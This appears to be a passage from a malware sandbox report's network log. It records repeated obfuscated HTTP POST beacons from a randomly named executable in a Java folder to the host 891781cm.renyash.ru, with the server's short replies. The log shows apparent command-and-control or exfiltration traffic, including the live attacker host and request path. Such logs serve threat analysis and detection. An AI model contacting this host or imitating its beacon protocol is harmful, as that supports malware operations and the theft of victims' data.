                                                                                                                  Data Ascii: PVXQZZT]UZTYQXUWX^\_YURY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(,=X#(>%>=\>,$B%-]$V$<;8_<-()#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:30.176873922 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:30.353044987 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=af1Vi2mpJwlPuASsCICRW%2BRB1WGRo7GRZTDllWJPmWAYe3ocjlzVSqfU4TXmyn5js0V7%2FQQH9VZ1Oh2a5R9QLlsPNyhJHLLa5kYQAtxou94krFRe%2BtL2kGDE9UNwSfKlG5huWjYi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d995f4c5e5f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2131&min_rtt=1776&rtt_var=1376&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=316085&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  110192.168.2.450073104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:30.480498075 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:30.837583065 CET1072OUTData Raw: 50 52 5d 56 5a 5e 51 5e 55 5a 54 59 51 5e 55 51 58 5e 5c 59 59 56 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PR]VZ^Q^UZTYQ^UQX^\YYVRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ \?6 ;)Y%.9\==+$>P-B;'/5$/ 8.?=<U(,#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:30.926383018 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:31.097976923 CET813INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OLqBsiERcGXwW%2FWr1VevF52u8pMNc2T%2FBUrl9c%2FGSPJQnEpI3AS2N8PKckbPRNcDcP7eTh%2BP4c%2FhWY4GcQgHMIjVTJUxvm7tZTqSv%2BTjLiSLq%2FyJxxRRZqhHk5h57vujzTgk2ikO"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d9df8a88c8d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2529&min_rtt=2015&rtt_var=1785&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=238056&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  111192.168.2.450079104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:31.234165907 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:31.587537050 CET1072OUTData Raw: 55 57 5d 57 5a 5d 51 5f 55 5a 54 59 51 59 55 52 58 5c 5c 59 59 5d 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UW]WZ]Q_UZTYQYURX\\YY]RZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#)?57;"%-5Z(-+$P,$<X3Y1'#/=?+W*<#^!'^)/
                                                                                                                  Jan 1, 2025 15:03:31.688674927 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  112192.168.2.450084104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:31.875824928 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:32.228365898 CET1796OUTData Raw: 50 55 58 56 5a 58 51 5b 55 5a 54 59 51 53 55 50 58 58 5c 54 59 52 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PUXVZXQ[UZTYQSUPXX\TYRRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+4+>$.%).<'$=9+$?Q$?3Z,7(=8>#^!'^)
                                                                                                                  Jan 1, 2025 15:03:32.386106014 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:32.551707983 CET964INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BIFXqvd6BKmcgNIlmRgCZF27%2BO%2FMHzX%2BFhTEQjJzONG%2BIWxjWVGlqhHdaK5RnvRssVQHKV%2B5hvEEmDNy7E0aXOAj%2FQeGTlkadeRuEXFDmnpT3gzV2iqSr5dU2hmMS8Fx9stMLnER"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30da71a56de98-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=32636&min_rtt=28677&rtt_var=18672&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=24192&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 50 33 38 2f 59 3f 58 2e 5a 38 06 3f 54 26 06 3a 1a 24 20 34 58 32 3d 25 59 3a 2b 2c 13 28 3b 0e 07 25 5c 36 07 37 31 3e 5c 24 26 2e 5d 04 1d 25 5c 3e 3a 36 1b 2b 11 31 1d 2a 1c 3f 00 33 09 3b 5c 24 34 30 59 24 03 29 00 20 31 2c 0e 25 23 38 53 2a 39 02 02 33 2e 3e 57 20 3a 2e 57 0d 12 22 51 31 00 3e 0f 28 31 28 10 22 02 20 0e 33 01 20 09 27 3f 33 09 37 06 29 0e 3d 11 24 58 22 19 3d 1d 30 29 23 58 21 17 0c 00 22 09 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"P38/Y?X.Z8?T&:$ 4X2=%Y:+,(;%\671>\$&.]%\>:6+1*?3;\$40Y$) 1,%#8S*93.>W :.W"Q1>(1(" 3 '?37)=$X"=0)#X!""T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  113192.168.2.450086104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:31.996481895 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:32.353317022 CET1072OUTData Raw: 50 53 58 55 5f 5c 54 5f 55 5a 54 59 51 58 55 53 58 5a 5c 54 59 56 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PSXU_\T_UZTYQXUSXZ\TYVR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ),"4%X25X)-+02Q:$#0/"$<;=7?.#*,#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:32.490699053 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:32.671252012 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ppopy6iR6lSqB8KCcVix74aDQbvRVJJTG9yIJun0PZejugwRwrNa9OcXmhT%2FNSYOEulJYFuiCfACqUdbK7JeFtfDacAJVXF95qz0ohVLpW%2FvFiCUoPR%2B2lT8XyZoAEDntjZ4juKk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30da7cba47289-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5749&min_rtt=4627&rtt_var=3979&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=107321&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  114192.168.2.450092104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:32.794709921 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:33.150691032 CET1072OUTData Raw: 55 5e 5d 53 5f 5b 51 5e 55 5a 54 59 51 53 55 51 58 5a 5c 59 59 52 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^]S_[Q^UZTYQSUQXZ\YYRR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (=Y#+-X2*(.$%-+$<"P3/<;=8($R(,#^!'^)
                                                                                                                  Jan 1, 2025 15:03:33.261324883 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:33.431134939 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:33 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q0RUNffyr0VvRBVmtd63DKW4Xo6bg8NL2IQAk6h%2BzoDMI%2BnLIMtY1XiZyMETPfvbOgr2HNHwranBDPK2fur0FQxxaocrh0chWhjJNk7l75SGw%2BJyzHcpZdeoYvegyHBXo0OKKQzq"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dac999e727d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3307&min_rtt=1974&rtt_var=3407&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=115497&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  115192.168.2.450098104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:33.558489084 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:33.915911913 CET1072OUTData Raw: 50 51 5d 56 5f 5a 54 59 55 5a 54 59 51 5a 55 53 58 53 5c 54 59 51 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQ]V_ZTYUZTYQZUSXS\TYQR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^+Y7]:1*=3X0".$/0&Q$,-?+<T(<#^!'^)#
                                                                                                                  Jan 1, 2025 15:03:34.030992031 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:34.297204018 CET810INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E%2BSrIcm9Lcf6deAzTKg51b4AvPYoZR4a8i2jBkugjX%2FfJwa63wl%2Fh6aoo9dMQT%2Bkrr%2BTZQMorcr5xTWlGYvXrrr3iMchURpmu8h6Kw1u%2B0xFkMQg7Zjp1b9IuwdQtDHcJwyDfusi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30db15ef5728c-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5068&min_rtt=2051&rtt_var=6805&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=55737&cwnd=165&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  116192.168.2.450104104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:34.470624924 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:34.821993113 CET1072OUTData Raw: 55 5f 5d 51 5f 5a 51 5b 55 5a 54 59 51 52 55 5c 58 5d 5c 58 59 56 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U_]Q_ZQ[UZTYQRU\X]\XYVR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ \?"4;%_&.9]>>7Y09'8$/!3/?-.;((*#^!'^)
                                                                                                                  Jan 1, 2025 15:03:34.913135052 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:35.175642967 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LyofnkBEPySElP2khCJBoUWjk4Be4k3Q%2F899CDsGlE5Py2U4QrQUOVGDJlueJJk7Hz3wwgBt1uAGmVokijd8YrWM2HmmQ2CSR0TpuyfACvqJZteB0V%2F0tJv7oq%2BGR643YxP%2B1QQt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30db6e8170f5f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1492&rtt_var=708&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=699233&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  117192.168.2.450111104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:35.309551001 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:35.665648937 CET1072OUTData Raw: 50 54 58 5d 5f 5b 51 59 55 5a 54 59 51 52 55 51 58 5d 5c 58 59 5c 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PTX]_[QYUZTYQRUQX]\XY\RS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(=#=2X&==?0B.Q-$Y3<20Z3X//(><=<#^!'^)
                                                                                                                  Jan 1, 2025 15:03:35.783241987 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:36.046303034 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2FdIIHQMqKaxseswvXXVjKFX5t4IuMRZhA0%2BxZsTZ3OQS4KApgiN%2F1Fy4r%2BEiMnxatUS0xN0CS3diXg6eOXCwZrKgfHEdlI0gdI5PHgbJZ1gihiQR69bGfitjpsvFY284fh6%2FT76"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dbc5bd4c34b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3582&min_rtt=1564&rtt_var=4622&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=82443&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a
                                                                                                                  Data Ascii: 41V[X
                                                                                                                  Jan 1, 2025 15:03:36.133307934 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  118192.168.2.450120104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:36.270596027 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:36.618868113 CET1072OUTData Raw: 55 57 58 55 5f 5b 54 58 55 5a 54 59 51 59 55 5c 58 58 5c 5b 59 54 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UWXU_[TXUZTYQYU\XX\[YTR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^+?1#=%>*=7_'!-440?1'?#^/X(<=<R>#^!'^)/
                                                                                                                  Jan 1, 2025 15:03:36.714202881 CET25INHTTP/1.1 100 Continue
